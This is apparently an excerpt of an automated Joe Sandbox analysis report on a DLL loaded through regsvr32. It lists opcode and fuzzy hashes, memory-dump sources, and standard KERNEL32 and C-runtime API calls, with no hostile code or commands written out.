                                                                                                                                                • Opcode Fuzzy Hash: e694225545c17882180803efd4dd10bf6022db2104e00cc5aed2eaf73a595679
                                                                                                                                                • Instruction Fuzzy Hash: 76A1A125A2D66AC1EA30EB27A93427A6391FF4079CF148E35DB1D477C5DE3CA4A5C320
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • GetCPInfo.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,?,?,00000000,?,00000000,?), ref: 00007FFC6720E292
                                                                                                                                                • GetCPInfo.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,?,?,00000000,?,00000000,?), ref: 00007FFC6720E2B1
                                                                                                                                                • MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,?,?,00000000,?,00000000,?), ref: 00007FFC6720E356
                                                                                                                                                • MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,?,?,00000000,?,00000000,?), ref: 00007FFC6720E3B5
                                                                                                                                                • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,?,?,00000000,?,00000000,?), ref: 00007FFC6720E3F0
                                                                                                                                                • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,?,?,00000000,?,00000000,?), ref: 00007FFC6720E42C
                                                                                                                                                • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,?,?,00000000,?,00000000,?), ref: 00007FFC6720E46C
                                                                                                                                                • free.LIBCMT ref: 00007FFC6720E47A
                                                                                                                                                • free.LIBCMT ref: 00007FFC6720E49C
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.280880041.00007FFC671C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFC671C0000, based on PE: true
                                                                                                                                                • Associated: 00000002.00000002.280872682.00007FFC671C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.280938947.00007FFC67212000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.280956305.00007FFC67216000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.280987525.00007FFC67219000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_7ffc671c0000_regsvr32.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ByteCharMultiWide$Infofree
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1638741495-0
                                                                                                                                                • Opcode ID: ce8117ab18d8874cf8440c92ec5f3b21420e9de26f709fb2524c2ddf018fd4d7
                                                                                                                                                • Instruction ID: 683be95795da3bb7d9b7e6c286b8749650ea76b48df82a2f768b56c826c909d2
                                                                                                                                                • Opcode Fuzzy Hash: ce8117ab18d8874cf8440c92ec5f3b21420e9de26f709fb2524c2ddf018fd4d7
                                                                                                                                                • Instruction Fuzzy Hash: 9461C272E0C696C6EB24AB22986417967D1FF94BACF544E35EA1D06BD4DF3CD481C230
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.280880041.00007FFC671C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFC671C0000, based on PE: true
                                                                                                                                                • Associated: 00000002.00000002.280872682.00007FFC671C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.280938947.00007FFC67212000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.280956305.00007FFC67216000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.280987525.00007FFC67219000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_7ffc671c0000_regsvr32.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: DecodePointer$_initterm$ExitProcess_lock
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2551688548-0
                                                                                                                                                • Opcode ID: 7b592d45c7ca6c6d8cb3fd2d09d1fb2d25a7c433dc9c00e1470d97789b8f3c14
                                                                                                                                                • Instruction ID: 032e001c45ada41f79255e530f6fc9f976bd5ccbe6ab0b8a42dfad5ae4f1e029
                                                                                                                                                • Opcode Fuzzy Hash: 7b592d45c7ca6c6d8cb3fd2d09d1fb2d25a7c433dc9c00e1470d97789b8f3c14
                                                                                                                                                • Instruction Fuzzy Hash: 3141C361A0D66AC1EA50DB13E8A853963D4FF8878CF440839EA4D037A6EF3CE455C734
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • GetStringTypeW.KERNEL32(?,?,?,?,00000000,0000000A,00000008,00007FFC67209206), ref: 00007FFC67208F94
                                                                                                                                                • GetLastError.KERNEL32(?,?,?,?,00000000,0000000A,00000008,00007FFC67209206), ref: 00007FFC67208FA6
                                                                                                                                                • MultiByteToWideChar.KERNEL32(?,?,?,?,00000000,0000000A,00000008,00007FFC67209206), ref: 00007FFC67209006
                                                                                                                                                • MultiByteToWideChar.KERNEL32(?,?,?,?,00000000,0000000A,00000008,00007FFC67209206), ref: 00007FFC672090BC
                                                                                                                                                • GetStringTypeW.KERNEL32(?,?,?,?,00000000,0000000A,00000008,00007FFC67209206), ref: 00007FFC672090D3
                                                                                                                                                • free.LIBCMT ref: 00007FFC672090E4
                                                                                                                                                • GetStringTypeA.KERNEL32(?,?,?,?,00000000,0000000A,00000008,00007FFC67209206), ref: 00007FFC67209161
                                                                                                                                                • free.LIBCMT ref: 00007FFC67209171
                                                                                                                                                  • Part of subcall function 00007FFC6720E23C: GetCPInfo.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,?,?,00000000,?,00000000,?), ref: 00007FFC6720E292
                                                                                                                                                  • Part of subcall function 00007FFC6720E23C: GetCPInfo.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,?,?,00000000,?,00000000,?), ref: 00007FFC6720E2B1
                                                                                                                                                  • Part of subcall function 00007FFC6720E23C: MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,?,?,00000000,?,00000000,?), ref: 00007FFC6720E3B5
                                                                                                                                                  • Part of subcall function 00007FFC6720E23C: WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,?,?,00000000,?,00000000,?), ref: 00007FFC6720E3F0
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.280880041.00007FFC671C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFC671C0000, based on PE: true
                                                                                                                                                • Associated: 00000002.00000002.280872682.00007FFC671C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.280938947.00007FFC67212000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.280956305.00007FFC67216000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.280987525.00007FFC67219000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_7ffc671c0000_regsvr32.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ByteCharMultiWide$StringType$Infofree$ErrorLast
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3535580693-0
                                                                                                                                                • Opcode ID: 851e935c27dd1964d5f09fdb64281df2a61b0302174b786e63cdd007473657bb
                                                                                                                                                • Instruction ID: 534fd92187c48978ea740d6e71e95e105d54b9a65204254025a3d2c0a9bdd80a
                                                                                                                                                • Opcode Fuzzy Hash: 851e935c27dd1964d5f09fdb64281df2a61b0302174b786e63cdd007473657bb
                                                                                                                                                • Instruction Fuzzy Hash: 7361A332B0C66ACAD7209F22D4684696792FF447ECB540A35EB5E13B94DE3CE851C760
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • GetStartupInfoA.KERNEL32 ref: 00007FFC6720377D
                                                                                                                                                  • Part of subcall function 00007FFC67203108: Sleep.KERNEL32(?,?,0000000A,00007FFC67202DA3,?,?,?,00007FFC67202DFF,?,?,?,00007FFC6720254F,?,?,?,00007FFC6720262A), ref: 00007FFC6720314D
                                                                                                                                                • GetFileType.KERNEL32 ref: 00007FFC672038FA
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.280880041.00007FFC671C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFC671C0000, based on PE: true
                                                                                                                                                • Associated: 00000002.00000002.280872682.00007FFC671C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.280938947.00007FFC67212000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.280956305.00007FFC67216000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.280987525.00007FFC67219000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_7ffc671c0000_regsvr32.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: FileInfoSleepStartupType
                                                                                                                                                • String ID: @
                                                                                                                                                • API String ID: 1527402494-2766056989
                                                                                                                                                • Opcode ID: be5b348199184886c2585225aa819b02cc7fe3bfefb3d916d7442fb5369bb0a2
                                                                                                                                                • Instruction ID: 843ca19614f9f6da8a459a1f6b15aeb923e7380ec7612dff8978ca94394702c6
                                                                                                                                                • Opcode Fuzzy Hash: be5b348199184886c2585225aa819b02cc7fe3bfefb3d916d7442fb5369bb0a2
                                                                                                                                                • Instruction Fuzzy Hash: AB917F21A1C6AAC5E7108B36D468A282B95FF06778F658B39C67D463D2DF7CE841C331
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.280880041.00007FFC671C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFC671C0000, based on PE: true
                                                                                                                                                • Associated: 00000002.00000002.280872682.00007FFC671C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.280938947.00007FFC67212000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.280956305.00007FFC67216000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.280987525.00007FFC67219000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_7ffc671c0000_regsvr32.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _errno$_getptd
                                                                                                                                                • String ID: +$-$0$0
                                                                                                                                                • API String ID: 3432092939-699404926
                                                                                                                                                • Opcode ID: 8efefd5caa40435472e3a9c676caa775b17fe32abe7b41ee90b269364e345ab9
                                                                                                                                                • Instruction ID: d67ce30f608ca7fa6cfafb4f7a3bb79c9ed3016a1a954372b19d08f49fd1b952
                                                                                                                                                • Opcode Fuzzy Hash: 8efefd5caa40435472e3a9c676caa775b17fe32abe7b41ee90b269364e345ab9
                                                                                                                                                • Instruction Fuzzy Hash: 2571B0A6D0C6AAC1F7B6C617846C37A27D5AF8475CF254937CA5E026E1DE6CE880C331
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • _FF_MSGBANNER.LIBCMT ref: 00007FFC67206ADF
                                                                                                                                                  • Part of subcall function 00007FFC67206F0C: GetModuleFileNameA.KERNEL32(?,?,?,?,?,00007FFC67207194,?,?,?,?,00007FFC67206C69,?,?,00000000,00007FFC672030C0), ref: 00007FFC67206FCF
                                                                                                                                                  • Part of subcall function 00007FFC6720334C: ExitProcess.KERNEL32 ref: 00007FFC6720335B
                                                                                                                                                  • Part of subcall function 00007FFC6720309C: Sleep.KERNEL32(?,?,00000000,00007FFC67206B19,?,?,00000000,00007FFC67206BC3,?,?,?,?,?,?,00000000,00007FFC67202DC8), ref: 00007FFC672030D2
                                                                                                                                                • _errno.LIBCMT ref: 00007FFC67206B21
                                                                                                                                                • _lock.LIBCMT ref: 00007FFC67206B35
                                                                                                                                                • free.LIBCMT ref: 00007FFC67206B57
                                                                                                                                                • _errno.LIBCMT ref: 00007FFC67206B5C
                                                                                                                                                • LeaveCriticalSection.KERNEL32(?,?,00000000,00007FFC67206BC3,?,?,?,?,?,?,00000000,00007FFC67202DC8,?,?,?,00007FFC67202DFF), ref: 00007FFC67206B82
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.280880041.00007FFC671C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFC671C0000, based on PE: true
                                                                                                                                                • Associated: 00000002.00000002.280872682.00007FFC671C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.280938947.00007FFC67212000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.280956305.00007FFC67216000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.280987525.00007FFC67219000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_7ffc671c0000_regsvr32.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _errno$CriticalExitFileLeaveModuleNameProcessSectionSleep_lockfree
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1354249094-0
                                                                                                                                                • Opcode ID: 281a6b99e1ceef077376b7d12b8049e3985eb177f8c0a9ab58ee7c303b441a02
                                                                                                                                                • Instruction ID: ad0452957be9908b80c4d8b44907178ba69dd09937a749d825be939232b8653c
                                                                                                                                                • Opcode Fuzzy Hash: 281a6b99e1ceef077376b7d12b8049e3985eb177f8c0a9ab58ee7c303b441a02
                                                                                                                                                • Instruction Fuzzy Hash: 4821A160E0D66AC2F660AB1394A837A6394FF84788F045835E64E466C2DF3CE480C730
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • GetLastError.KERNEL32(?,?,?,00007FFC67202DFF,?,?,?,00007FFC6720254F,?,?,?,00007FFC6720262A), ref: 00007FFC67202D7A
                                                                                                                                                • FlsGetValue.KERNEL32(?,?,?,00007FFC67202DFF,?,?,?,00007FFC6720254F,?,?,?,00007FFC6720262A), ref: 00007FFC67202D88
                                                                                                                                                • SetLastError.KERNEL32(?,?,?,00007FFC67202DFF,?,?,?,00007FFC6720254F,?,?,?,00007FFC6720262A), ref: 00007FFC67202DE0
                                                                                                                                                  • Part of subcall function 00007FFC67203108: Sleep.KERNEL32(?,?,0000000A,00007FFC67202DA3,?,?,?,00007FFC67202DFF,?,?,?,00007FFC6720254F,?,?,?,00007FFC6720262A), ref: 00007FFC6720314D
                                                                                                                                                • FlsSetValue.KERNEL32(?,?,?,00007FFC67202DFF,?,?,?,00007FFC6720254F,?,?,?,00007FFC6720262A), ref: 00007FFC67202DB4
                                                                                                                                                • free.LIBCMT ref: 00007FFC67202DD7
                                                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 00007FFC67202DC8
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.280880041.00007FFC671C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFC671C0000, based on PE: true
                                                                                                                                                • Associated: 00000002.00000002.280872682.00007FFC671C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.280938947.00007FFC67212000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.280956305.00007FFC67216000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.280987525.00007FFC67219000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_7ffc671c0000_regsvr32.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ErrorLastValue_lock$CurrentSleepThreadfree
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3106088686-0
                                                                                                                                                • Opcode ID: 1a58bbec3c0441b91cbee7445021737d92780d7df2029101222d8d22fa3fe0c2
                                                                                                                                                • Instruction ID: 817eb6cd2b673df0c74823c08ad2bfab1e5142a93ab16b6b6f0cc942041f36e1
                                                                                                                                                • Opcode Fuzzy Hash: 1a58bbec3c0441b91cbee7445021737d92780d7df2029101222d8d22fa3fe0c2
                                                                                                                                                • Instruction Fuzzy Hash: 72017565B0DB5AC6FA14DB67946813863E2FF49758B044A34DA2D063D1EE3CE844C230
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.280880041.00007FFC671C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFC671C0000, based on PE: true
                                                                                                                                                • Associated: 00000002.00000002.280872682.00007FFC671C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.280938947.00007FFC67212000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.280956305.00007FFC67216000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.280987525.00007FFC67219000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_7ffc671c0000_regsvr32.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: free$ErrorFreeHeapLast_errno
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1012874770-0
                                                                                                                                                • Opcode ID: 2467c4f6b5832abe9fd2be6a03a61b6f94b407d58b9f6526efad8e926ce1459f
                                                                                                                                                • Instruction ID: 81a711615a77211ccf0a9eca7df964cd8f82e293bc0fe5c537daf2256271f590
                                                                                                                                                • Opcode Fuzzy Hash: 2467c4f6b5832abe9fd2be6a03a61b6f94b407d58b9f6526efad8e926ce1459f
                                                                                                                                                • Instruction Fuzzy Hash: 7D01BA23E0D4AAD1EE64DB63D4B58795361BF8074CF441936D64E46592DF6EF890C330
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.280880041.00007FFC671C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFC671C0000, based on PE: true
                                                                                                                                                • Associated: 00000002.00000002.280872682.00007FFC671C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.280938947.00007FFC67212000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.280956305.00007FFC67216000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.280987525.00007FFC67219000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_7ffc671c0000_regsvr32.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: free
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1294909896-0
                                                                                                                                                • Opcode ID: 66c2a68ae6921ce3eae9ed6cb47659e8359417b2a45b1d2ea151f135524af05a
                                                                                                                                                • Instruction ID: a243bd6c685d934cf4c0b4df2c90709531ab772f5695964320c6b7d58b1a6a69
                                                                                                                                                • Opcode Fuzzy Hash: 66c2a68ae6921ce3eae9ed6cb47659e8359417b2a45b1d2ea151f135524af05a
                                                                                                                                                • Instruction Fuzzy Hash: 1FB19F32B1DB99C9EB20DB23E0645AA77A0FB89748F405935EA8E43785EF3CD105C760
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.280880041.00007FFC671C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFC671C0000, based on PE: true
                                                                                                                                                • Associated: 00000002.00000002.280872682.00007FFC671C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.280938947.00007FFC67212000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.280956305.00007FFC67216000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.280987525.00007FFC67219000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_7ffc671c0000_regsvr32.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: free$Sleep_errno
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2081351063-0
                                                                                                                                                • Opcode ID: ec136e1b37b0cf75a1e1cbd0173697211363db55ec0de315659f58b3930cb5b5
                                                                                                                                                • Instruction ID: d0beb6dd9ef6d10319de2a3f843a30104307bd5ac85304b42cf54ba9d1ef8315
                                                                                                                                                • Opcode Fuzzy Hash: ec136e1b37b0cf75a1e1cbd0173697211363db55ec0de315659f58b3930cb5b5
                                                                                                                                                • Instruction Fuzzy Hash: C5311B21A0D66AC5EB149B23C4B9679A7A1BF44FC8F489835DA0D07796EE7CE840C370
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • DecodePointer.KERNEL32(?,?,?,00007FFC672073E5,?,?,?,?,00007FFC672034D2,?,?,?,00007FFC672021CB), ref: 00007FFC672072FD
                                                                                                                                                • DecodePointer.KERNEL32(?,?,?,00007FFC672073E5,?,?,?,?,00007FFC672034D2,?,?,?,00007FFC672021CB), ref: 00007FFC6720730C
                                                                                                                                                • EncodePointer.KERNEL32(?,?,?,00007FFC672073E5,?,?,?,?,00007FFC672034D2,?,?,?,00007FFC672021CB), ref: 00007FFC67207389
                                                                                                                                                  • Part of subcall function 00007FFC6720318C: realloc.LIBCMT ref: 00007FFC672031B7
                                                                                                                                                  • Part of subcall function 00007FFC6720318C: Sleep.KERNEL32(?,?,00000000,00007FFC67207379,?,?,?,00007FFC672073E5,?,?,?,?,00007FFC672034D2), ref: 00007FFC672031D3
                                                                                                                                                • EncodePointer.KERNEL32(?,?,?,00007FFC672073E5,?,?,?,?,00007FFC672034D2,?,?,?,00007FFC672021CB), ref: 00007FFC67207398
                                                                                                                                                • EncodePointer.KERNEL32(?,?,?,00007FFC672073E5,?,?,?,?,00007FFC672034D2,?,?,?,00007FFC672021CB), ref: 00007FFC672073A4
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.280880041.00007FFC671C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFC671C0000, based on PE: true
                                                                                                                                                • Associated: 00000002.00000002.280872682.00007FFC671C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.280938947.00007FFC67212000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.280956305.00007FFC67216000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.280987525.00007FFC67219000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_7ffc671c0000_regsvr32.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Pointer$Encode$Decode$Sleep_errnorealloc
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1310268301-0
                                                                                                                                                • Opcode ID: 45f99762a2f7ec127277c333d1f44571b1c8f3f0bb701b28e9aac5b400b42b2d
                                                                                                                                                • Instruction ID: 390775e2edd1e3f4f96a566f7b815eef1d19aa0ddfebf6c7d12dcff6c543ed69
                                                                                                                                                • Opcode Fuzzy Hash: 45f99762a2f7ec127277c333d1f44571b1c8f3f0bb701b28e9aac5b400b42b2d
                                                                                                                                                • Instruction Fuzzy Hash: 47215E11B0D66AD1EE14EB63E5AC0A9A3A1BF45BC8F444C36DA0D0B796DE7CE485C370
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.280880041.00007FFC671C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFC671C0000, based on PE: true
                                                                                                                                                • Associated: 00000002.00000002.280872682.00007FFC671C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.280938947.00007FFC67212000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.280956305.00007FFC67216000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.280987525.00007FFC67219000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_7ffc671c0000_regsvr32.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Pointer$Encode$Decode$Sleep_errnorealloc
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1310268301-0
                                                                                                                                                • Opcode ID: eece0b224e2bcc70f9921190d9f8722cba86776407b6ce9ac89865c4675fc459
                                                                                                                                                • Instruction ID: 29134fd4536d75a868eae26db991d65554ca4ded1a5db3458d4d6040f37f2b25
                                                                                                                                                • Opcode Fuzzy Hash: eece0b224e2bcc70f9921190d9f8722cba86776407b6ce9ac89865c4675fc459
                                                                                                                                                • Instruction Fuzzy Hash: C9218311B0D6AAD9EE14EB23A568179A391FF457D8F484C35EA4D07756DE3CE085C330
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • GetModuleHandleW.KERNEL32(?,?,000000FF,00007FFC67203359,?,?,00000028,00007FFC67206C7D,?,?,00000000,00007FFC672030C0,?,?,00000000,00007FFC67206B19), ref: 00007FFC6720331F
                                                                                                                                                • GetProcAddress.KERNEL32(?,?,000000FF,00007FFC67203359,?,?,00000028,00007FFC67206C7D,?,?,00000000,00007FFC672030C0,?,?,00000000,00007FFC67206B19), ref: 00007FFC67203334
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.280880041.00007FFC671C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFC671C0000, based on PE: true
                                                                                                                                                • Associated: 00000002.00000002.280872682.00007FFC671C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.280938947.00007FFC67212000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.280956305.00007FFC67216000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.280987525.00007FFC67219000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_7ffc671c0000_regsvr32.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: AddressHandleModuleProc
                                                                                                                                                • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                • API String ID: 1646373207-1276376045
                                                                                                                                                • Opcode ID: d72bc5d50b22d09011b632762878156ef0257bf259d16f3c3461911ef1dd3856
                                                                                                                                                • Instruction ID: 2a938dc926b5c0b9fa411cb5e9c7b437ebbe2c893a09c44f0e961a4b48c5679b
                                                                                                                                                • Opcode Fuzzy Hash: d72bc5d50b22d09011b632762878156ef0257bf259d16f3c3461911ef1dd3856
                                                                                                                                                • Instruction Fuzzy Hash: A7E01290F1D62AC2FE19DB62A8A453413D1BF59B24B485C3CD91F063A1DE7CB698C370
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 00007FFC6720309C: Sleep.KERNEL32(?,?,00000000,00007FFC67206B19,?,?,00000000,00007FFC67206BC3,?,?,?,?,?,?,00000000,00007FFC67202DC8), ref: 00007FFC672030D2
                                                                                                                                                • free.LIBCMT ref: 00007FFC672058A5
                                                                                                                                                • free.LIBCMT ref: 00007FFC672058C1
                                                                                                                                                  • Part of subcall function 00007FFC67206550: RtlCaptureContext.KERNEL32 ref: 00007FFC6720658F
                                                                                                                                                  • Part of subcall function 00007FFC67206550: IsDebuggerPresent.KERNEL32 ref: 00007FFC6720662D
                                                                                                                                                  • Part of subcall function 00007FFC67206550: SetUnhandledExceptionFilter.KERNEL32 ref: 00007FFC67206637
                                                                                                                                                  • Part of subcall function 00007FFC67206550: UnhandledExceptionFilter.KERNEL32 ref: 00007FFC67206642
